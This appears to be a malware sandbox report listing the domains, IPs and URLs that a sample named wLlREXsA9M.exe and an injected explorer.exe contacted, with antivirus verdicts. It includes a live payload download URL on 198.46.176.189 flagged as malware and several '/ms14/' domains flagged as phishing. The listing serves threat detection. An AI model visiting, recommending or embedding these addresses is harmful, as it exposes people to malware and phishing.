http://www.wshaizapp.site/ms14/	100%	Avira URL Cloud	phishing
http://www.lasik-de-de-8808230.zone	0%	Avira URL Cloud	safe
http://www.wshaizapp.siteReferer:	0%	Avira URL Cloud	safe
http://www.qwevqgjw.cfd/ms14/	0%	Avira URL Cloud	safe
http://www.qhrxnxoe.cfd/ms14/www.peterscanner.com	0%	Avira URL Cloud	safe
http://www.clasmiv.xyzReferer:	0%	Avira URL Cloud	safe
http://www.clasmiv.xyz/ms14/www.duffledash.com	100%	Avira URL Cloud	phishing
http://www.genqaagz.cfd	0%	Avira URL Cloud	safe
http://www.peterscanner.com	0%	Avira URL Cloud	safe
http://www.cacciatoridiofferte.com/ms14/www.qhrxnxoe.cfd	0%	Avira URL Cloud	safe
http://www.lojaasoriginais.online/ms14/www.aniwatch.top	0%	Avira URL Cloud	safe
http://www.aniwatch.top/ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&5jjx=X41P	100%	Avira URL Cloud	phishing
http://www.tchyhg.com/ms14/www.wshaizapp.site	0%	Avira URL Cloud	safe
http://198.46.176.189/windows/kHjzvgNVUFKkek92.bin	100%	Avira URL Cloud	malware
http://www.zbjcolwy.cfd	0%	Avira URL Cloud	safe
http://www.cacciatoridiofferte.comReferer:	0%	Avira URL Cloud	safe
http://www.qwevqgjw.cfd/ms14/www.lasik-de-de-8808230.zone	0%	Avira URL Cloud	safe
http://www.nihil.oneReferer:	0%	Avira URL Cloud	safe
http://www.aniwatch.top/ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&-Zxtd=AXLT	100%	Avira URL Cloud	phishing
http://www.lasik-de-de-8808230.zone/ms14/www.qhrxnxoe.cfd	0%	Avira URL Cloud	safe
http://www.qhrxnxoe.cfd/ms14/?1b-=gRDHLRWps2SwfQlNymIqzXaD2m02lj01kyW0DgHYrNguW9LYnKWDMhmIqN1YZq9kwDef&5jjx=X41P	0%	Avira URL Cloud	safe
http://www.clasmiv.xyz/ms14/	100%	Avira URL Cloud	phishing
http://www.nihil.one/ms14/	0%	Avira URL Cloud	safe
http://www.lilith-con.com/ms14/www.civzbpp.xyz	0%	Avira URL Cloud	safe
http://www.zbjcolwy.cfd/ms14/?1b-=Wkneoq9l7j621GOHWXUj6c6StoZcfXIkvhnfDRklCPhPpoBwnB0eenfjXWBkChp12+Xn&5jjx=X41P	0%	Avira URL Cloud	safe
http://www.pgtjirqx.cfd/ms14/	0%	Avira URL Cloud	safe
http://schemas.m	0%	Avira URL Cloud	safe
http://198.46.176.189/	100%	Avira URL Cloud	malware
http://www.duffledash.com/ms14/(	0%	Avira URL Cloud	safe
http://www.cacciatoridiofferte.com	0%	Avira URL Cloud	safe
http://198.46.176.189/windows/kHjzvgNVUFKkek92.bin.	100%	Avira URL Cloud	malware
http://www.tchyhg.com/ms14/	0%	Avira URL Cloud	safe
http://www.qhrxnxoe.cfd	0%	Avira URL Cloud	safe
http://www.nihil.one/ms14/?1b-=4tMVn6XiBHKuKW8VU2EIZ5B/qrpEFZzqaYDMFWWeQmJxL9kkTfJwlmrKp7OjJJRb95od&5jjx=X41P	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xqw1666688.top	8.212.100.103	true	true		unknown
cacciatoridiofferte.com	195.110.124.133	true	true		unknown
dwerweima01.cn	52.76.96.91	true	true		unknown
www.aniwatch.top	199.59.243.224	true	true	0%, Virustotal, Browse	unknown
duffledash.com	34.102.136.180	true	false		unknown
www.nihil.one	45.77.219.226	true	true		unknown
www.qhrxnxoe.cfd	107.148.132.46	true	true		unknown
www.ypasbfxplu.shop	188.114.97.14	true	true		unknown
www.zbjcolwy.cfd	107.148.83.209	true	true		unknown
www.peterscanner.com	118.27.130.228	true	true		unknown
lojaasoriginais.online	23.227.38.65	true	true		unknown
www.pgtjirqx.cfd	38.53.14.151	true	true		unknown
venria.store	198.252.102.187	true	true		unknown
lilith-con.com	185.238.87.6	true	true		unknown
www.genqaagz.cfd	38.53.14.66	true	true		unknown
ssl1.prod.systemdragon.com	104.17.157.1	true	true		unknown
www.qwevqgjw.cfd	199.188.104.120	true	true		unknown
www.aqeabrdm.cfd	unknown	unknown	true		unknown
www.lilith-con.com	unknown	unknown	true		unknown
www.venria.store	unknown	unknown	true		unknown
www.lojaasoriginais.online	unknown	unknown	true		unknown
www.duffledash.com	unknown	unknown	true		unknown
www.civzbpp.xyz	unknown	unknown	true		unknown
www.sxbhpysr.cfd	unknown	unknown	true		unknown
www.cacciatoridiofferte.com	unknown	unknown	true		unknown
www.lasik-de-de-8808230.zone	unknown	unknown	true		unknown
www.wshaizapp.site	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.cacciatoridiofferte.com/ms14/?1b-=v4jnj8oeAfTGDwcmYumWnwKscPxyy00cSlVLGwHp+ICaVPGa7n49O8PyWRHvgaeZi/w4&-Zxtd=AXLT	true	Avira URL Cloud: safe	unknown
http://www.sxbhpysr.cfd/ms14/?1b-=FAG/3ElgsYO4ErXa/mgt4C2qrKDxzHtkbmVaewmXtr6V8s4U3UCtQRfDU66dhU0yfzW0&5jjx=X41P	true	Avira URL Cloud: safe	unknown
http://www.venria.store/ms14/?1b-=x+ehIhQzCHSzi6+DzanXnJOFQcXmX6xS+w2gYe8McJfF9Pp0nYwm3E09SfZIXmikxG0j&5jjx=X41P	true	Avira URL Cloud: safe	unknown
http://www.lojaasoriginais.online/ms14/?1b-=YHJhEiWoifUmsuRZQbUaqtt89OE4JOQRavFR3vIQ0joiEOwiU7X+YqSmQ5n9nRvRM2aG&5jjx=X41P	true	Avira URL Cloud: safe	unknown
http://198.46.176.189/windows/kHjzvgNVUFKkek92.bin	true	Avira URL Cloud: malware	unknown
http://www.aniwatch.top/ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&5jjx=X41P	true	Avira URL Cloud: phishing	unknown
http://www.aniwatch.top/ms14/?1b-=CKdxKfUSo22ZA3LOsCE+RVTQXZ6VDMwkgwUFVpD0jjvtMSwdrQmMlQAEfm5imY1vlK4D&-Zxtd=AXLT	true	Avira URL Cloud: phishing	unknown
http://www.qhrxnxoe.cfd/ms14/?1b-=gRDHLRWps2SwfQlNymIqzXaD2m02lj01kyW0DgHYrNguW9LYnKWDMhmIqN1YZq9kwDef&5jjx=X41P	true	Avira URL Cloud: safe	unknown
http://www.zbjcolwy.cfd/ms14/?1b-=Wkneoq9l7j621GOHWXUj6c6StoZcfXIkvhnfDRklCPhPpoBwnB0eenfjXWBkChp12+Xn&5jjx=X41P	true	Avira URL Cloud: safe	unknown
http://www.nihil.one/ms14/?1b-=4tMVn6XiBHKuKW8VU2EIZ5B/qrpEFZzqaYDMFWWeQmJxL9kkTfJwlmrKp7OjJJRb95od&5jjx=X41P	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.msn.com/de-de/sport/motorsport/motogp/renn-kalender	explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.zbjcolwy.cfd/ms14/	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aqeabrdm.cfd/ms14/	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jroxtqpq.cfdReferer:	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/finanzen/toph	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.qwevqgjw.cfdReferer:	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wshaizapp.site/ms14/www.lilith-con.com	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.986723975.0000000002DBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5847493003.0000000002DC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/de-de/sport/fussball/soccer-international-world-cup-women	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.lilith-con.comReferer:	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/auto/nachrichten/ist-das-noch-ein-auto-t	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	wLlREXsA9M.exe, 00000003.00000001.908308746.0000000000649000.00000020.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
http://www.civzbpp.xyz/ms14/	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://aka.ms/odirm~	explorer.exe, 00000004.00000002.5857150402.000000000930B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2623397647.000000000930D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.996144169.000000000930B000.00000004.00000001.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	explorer.exe, 00000004.00000000.1003204697.000000000CA90000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nihil.one	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msnh	explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000004.00000003.1625996689.000000000CC52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CC52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CC52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2626039120.000000000CC52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5864588777.000000000CC52000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	wLlREXsA9M.exe, 00000003.00000001.908308746.0000000000626000.00000020.00000001.01000000.00000005.sdmp	false		high
https://www.msn.com/de-de/unterhaltung/kino/die-dramatischsten-serientode-der-tv-geschichte/ss-AA1eC	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.aniwatch.topReferer:	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aniwatch.top/ms14/www.jroxtqpq.cfd	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.gopher.ftp://ftp.	wLlREXsA9M.exe, 00000003.00000001.908308746.0000000000649000.00000020.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/nachrichten/welt/russlands-grizzly-geht-in-flammen-auf-video-zeigt-pr	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.civzbpp.xyz	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	explorer.exe, 00000004.00000002.5881611016.000000001417F000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.5850947606.0000000003C0F000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.msn.com/de-de/video/nachrichten/feuerball-im-gesicht-raucher-erlebt-b	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.aniwatch.top/ms14/www.genqaagz.cfd	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.peterscanner.comReferer:	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/nachrichten/panorama/jugendliche-	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.wshaizapp.site/ms14/	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.wshaizapp.siteReferer:	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.duffledash.comReferer:	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/reisen/nachrichten/invasion-an-der-ostsee/ar-AA1eDw6u	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.lasik-de-de-8808230.zone	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CDA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CDA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3131211536.000000000CD9B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CDA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CDA0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.civzbpp.xyzReferer:	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/nachrichten/panorama/sanit	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.civzbpp.xyz/ms14/www.lojaasoriginais.online	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.peterscanner.com/ms14/	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/nachrichten/welt/putin-sieht-nur-einen-ausweg/ar-AA1eEs3S	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/de-de/sport/motorsport/nascar/renn-kalender	explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.qhrxnxoe.cfd/ms14/www.peterscanner.com	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qwevqgjw.cfd/ms14/	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.clasmiv.xyz/ms14/www.duffledash.com	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeS	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.clasmiv.xyzReferer:	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.com	explorer.exe, 00000004.00000000.993799957.000000000916D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5854922635.000000000916D000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.genqaagz.cfd	explorer.exe, 00000004.00000003.1625813454.00000000113B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3130496258.00000000113AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-de/unterhaltung/kino/the-witcher-4-f	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.peterscanner.com	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cacciatoridiofferte.com/ms14/www.qhrxnxoe.cfd	explorer.exe, 00000004.00000002.5879535520.00000000113B1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-US	explorer.exe, 00000004.00000002.5868318064.000000000CD39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2630032814.000000000CD37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2614984490.000000000CD1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2603837783.000000000CCFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2609862416.000000000CD12000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.1625996689.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1003204697.000000000CCF0000.00000004.00000001.00020000.00000000.sdmp	false		high
